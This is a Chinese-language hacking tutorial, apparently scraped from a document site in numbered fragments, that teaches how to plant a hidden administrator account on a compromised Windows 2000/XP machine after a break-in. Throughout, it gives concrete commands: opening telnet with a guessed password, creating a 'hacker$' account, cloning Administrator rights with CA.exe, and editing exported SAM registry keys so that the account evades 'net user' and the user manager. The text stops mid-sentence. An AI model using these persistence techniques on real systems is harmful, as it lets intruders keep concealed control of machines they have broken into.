隱藏超級用戶創(chuàng)建全接觸

1、安全學習：隱藏超級用戶創(chuàng)建全接觸 成功入侵達到目的之后，是不是想再做的點什么？哦！得多留個心眼，留下個后門什么的？可后門木馬程序容易被查殺，還是創(chuàng)建一個隱藏的超級用戶比較安全，在學習借鑒的基礎，經(jīng)過反復研究實踐，總結出了如下如下幾種創(chuàng)建隱藏超級用戶的方法。一、利用帳戶克隆工具來創(chuàng)建Clone Administrator（CA.exe），利用這個工具可以將Administrator的帳號克隆為一個指定的普通帳號（此普通帳號必須已經(jīng)存在）?？寺〉玫降膸ぬ柧哂泻拖到y(tǒng)內置的Administrator同樣的設置，并且用NET命令或者用戶管理器也發(fā)現(xiàn)不了其權限已經(jīng)被提升，是一個不錯的ROOT K

2、IT?，F(xiàn)在，我們就來看看如何利用帳戶克隆工具在肉雞上創(chuàng)建隱藏的超級用戶。利用流光、SuperScan等進行掃描，假設已經(jīng)掃描到一遠程主機的Administrator帳戶，其密碼為123。我們可以使用DameWare Mini Remote Control（簡稱DMRC），在圖形界面（GUI）中來遠程控制遠程主機。也可以使用OpenTelnet.exe工具來開啟遠程主機的TELNET服務，其命令格式為：OpenTelnet.exe server username password NTLMAuthor telnetport，使用命令：opentelnet 192.XX.XX.2 Administ

3、rator "123" 0 99，呵呵，沒想這么成功容易就開啟肉雞的TELNET吧！接著使用命令：Telnet 192.XX.XX.2 99，輸入帳戶及密碼，成功獲取一SHELL。 首先想辦法查看一下有哪些用戶被細心的管理員禁止，一般情況下，有些管理員出于安全考慮，通常會將guest禁用，當然也會禁用其他用戶。在圖形界面下，非常容易識別，只要在帳戶管理器中就可以看到被禁用的帳戶上有一個紅叉。但在命令行狀態(tài)下，只能使用命令：“net user 用戶名”一個一個來查看用戶是否被禁用。如果懶得這樣麻煩，可自行建立一個新的帳戶，命令為：“Net user hacker$ youko

4、u /add”，然后使用命令：“Net user hacker$ /active:no”來停用此帳戶。 斷開與遠程主機的連接，用小榕的超級用戶克隆程序CA.exe，將被禁用的用戶hacker$克隆成超級用戶，命令為：CA.EXE 192.XX.XX.2 Administrator 123 hacker$ youkou，成功！ 這時，hacker$就成為了超級用戶，并有具有和Administrator同樣的設置(桌面、菜單等等）。但還是得檢查一下，用CCA.exe，命令如下：cca 192.XX.XX.2 administrator 123。 看到這一行返回信息沒有？“hacker$ AS SA

5、ME AS Administrator”，說明hacker$帳戶和Administrator相同，克隆成功。二、圖形界面建隱藏超級用戶恐怕我們最熟悉的就是在圖形界面下進行操作了，這對于在本地計算機、3389終端服務肉雞或使用DMRC等控制的肉雞上創(chuàng)建隱藏超級用戶 再好不過了。大家知道嗎？Windows 2000中有兩個注冊表編輯器：Regedit.exe和Regedt32.exe，Windows XP中Regedit.exe和Regedt32.exe實為一個程序，修改鍵值的權限時在右鍵快捷菜單中選擇“權限”來修改。對Regedit.exe我想大家都很熟悉，但卻不能對注冊表的鍵進行權限設置，而R

6、egedt32.exe最大的優(yōu)點就是能夠對注冊表的項鍵設置權限。Windows NT/2000/XP的帳戶信息都在注冊表的HKEY_LOCAL_MACHINESAMSAM鍵下，但是除了系統(tǒng)用戶SYSTEM外，其他用戶都沒有權限查看到其中的信息，因此首先得用Regedt32.exe對“HKEY_LOCAL_MACHINESAMSAM”鍵設置為“完全控制”權限。這樣就可以對SAM鍵內的信息進行讀寫操作。首先在肉雞中創(chuàng)建一個新的帳戶hacker$，可以在帳戶管理器中建立，也可以使用命令：net user hacker$ 123 /add 來創(chuàng)建。然后通過“開始”菜單中的“運行”，輸入regedt32

7、.exe，點擊“確定”后就打開了注冊表編輯器。依次展開子鍵HKEY_LOCAL_MACHINESAMSAM，用鼠標右鍵單擊，在彈出的快捷菜單中選擇“權限”項。 在出現(xiàn)的“SAM 權限”對話窗口中，點擊“添加”將我登錄時的帳戶添加到“組或用戶名稱”列表中，這里我是以administrator的身份登錄的，所以我就將administrator加入，在下部的權限功能區(qū)設置權限為“完全控制”。 小提示：最好是添加你登錄的帳戶或帳戶所在的組，切莫修改原有的帳戶或組，否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以后，再來這里將你添加的帳戶刪除即可。如果還是不能展開子鍵，請關閉后重新打開，如果是Win

8、dows 2000的機器，請關閉這個注冊表編輯器，重新打開“regedit.exe”。展開子鍵：HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNameshacker$，在其右側窗口中發(fā)現(xiàn)其默認值為0x3F1。 下面將hacker$鍵、hacker$對應的項000003F1以及administrator所對應的項000001F4導出為hacker.reg、3EE.reg和1f4.reg，退出注冊表編輯器。用記事本分別打開這幾個導出的文件進行編輯，將超級用戶對應的項000001F4下的鍵“F”的值復制，并覆蓋hacker$對應的項000003EE下的鍵“F”

9、的值，然后將hacker.reg和3EE.reg合并為hacker.reg。 接下來在命令行下執(zhí)行net user hacker$ /del將用戶hacker$刪除，最后再將hacker.reg導入注冊表即可?，F(xiàn)在，隱藏的超級用戶hacker$已經(jīng)建好了。打開regedt32.exe，把HKEY_LOCAL_MACHINESAMSAM鍵權限改回原來的樣子（只要刪除添加的帳戶administrator即可）。注意：隱藏的超級用戶建好后，就能在帳戶管理器看不到hacker$這個用戶，在命令行用“net user”命令也看不到，但是超級用戶建立以后，就不能再改密碼了，如果用net user命令來改h

10、acker$的密碼的話，那么在帳戶管理器中將又會看這個隱藏的超級用戶了，而且不能刪除。三、命令行建立隱藏超級用戶首先通過使用OpenTelnet.exe工具來開啟遠程主機的TELNET服務，然后TELNET遠程登陸得到一個shell，創(chuàng)建一個新的帳戶，命令為：net user hacker$ youkou /add，然后就來導出注冊表項HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers，運行命令：regedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers，其中/e 是regedi

11、t.exe的參數(shù)，在HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers這個鍵的一定要以“”結尾。 斷開TELNET連接，建立IPC會話：net use 192.XX.XX.2ipc$ "123" /user:"administrator，然后將肉雞上的hacker.reg下載到本機上用記事本打開進行編輯命令為：copy 192.XX.XX.2D$hacker.reg，用記事本編輯，將超級用戶對應的項000001F4下的鍵“F”的值復制，并覆蓋hacker$對應的項000003EE下的鍵“F”的值（hacker$對應的項在不同的機

12、器而不同），編輯好后再上傳：copy hacker.reg 192.XX.XX.2D$hacker1.reg 。再TELNET到遠程主機，使用命令net user hacker$ /del刪除hacker$帳戶，然后把hacker.reg導入，命令為：regedit.exe /s hacker.reg，其中參數(shù)/s表示以安靜模式導入。這樣就成功創(chuàng)建了一個隱藏的超級用戶。四、連接遠程肉雞注冊表創(chuàng)建還有一個比較簡單方便的辦法，就是通過控制臺以及注冊表編輯器“文件”菜單中的“連接網(wǎng)絡注冊表”功能來完成隱藏超級用戶的創(chuàng)建。通過“開始”菜單中的“運行”，輸入MMC，回車后即打開了控制臺，打開“文件”菜單

13、中的“添加/刪除管理單元”（快捷鍵CTRL+M），在出現(xiàn)的對話框中點擊“添加”按鈕，在出現(xiàn)的“添加獨立管理單元”對話框中的列表中選擇“本地用戶和組”。 單擊“添加”即彈出“選擇目標機器”對話框，選中“另一臺計算機”，在其后輸入遠程計算機的IP地址，點擊“完成”。 一路關閉返回至控制臺窗口，我們就可對遠程計算機進行組和用戶的管理了，在右側窗口空白處右擊，在彈出的快捷選擇“新用戶”建立一帳戶hacker$吧！我們知道，regedit.exe、regedt32.exe都有連接網(wǎng)絡注冊表的功能，我們可以用regedt32.exe來為遠程主機的注冊表項設置權限，用regedit.exe來編輯遠程注冊表。導出相應注冊項，然后進行編輯修改（同上面介紹相似）。 現(xiàn)在在“控制臺”中刪除剛建立的帳戶hacker$，然后關閉。然后在注冊表編輯器中通過“文件”菜單中的“導入”功能將上面導出的文件導入即可。如果遠程主機沒有